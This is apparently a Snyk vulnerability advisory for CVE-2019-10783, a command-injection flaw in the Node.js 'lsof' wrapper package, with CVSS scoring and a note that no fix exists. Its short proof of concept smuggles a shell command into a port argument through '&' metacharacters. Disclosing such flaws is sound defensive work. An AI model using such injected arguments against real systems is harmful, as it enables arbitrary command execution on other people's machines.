Command Injection

Affecting lsof package, ALL versions


Overview

lsof is a Node.js wrapper around the lsof (list open files) command-line utility.

Affected versions of this package are vulnerable to Command Injection. Multiple areas of the package are vulnerable to command injection: every exported method of the package builds a shell command string from its arguments and runs it through the exec function, so user-controlled input reaches the shell unescaped.

PoC by JHU System Security Lab

var root = require("lsof");
// The argument is concatenated into the shell command that exec runs, so the
// shell metacharacters in it are interpreted rather than treated as a port.
var attack_code = "& echo vulnerable > create.txt &";
root.rawTcpPort(attack_code, function(){});

Remediation

There is no fixed version for lsof.

CVSS Score

7.5
high severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    None
  • Availability
    None
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C
Credit: JHU System Security Lab
CVE: CVE-2019-10783
CWE: CWE-78
Snyk ID: SNYK-JS-LSOF-543632
Disclosed: 29 Jan, 2020
Published: 29 Jan, 2020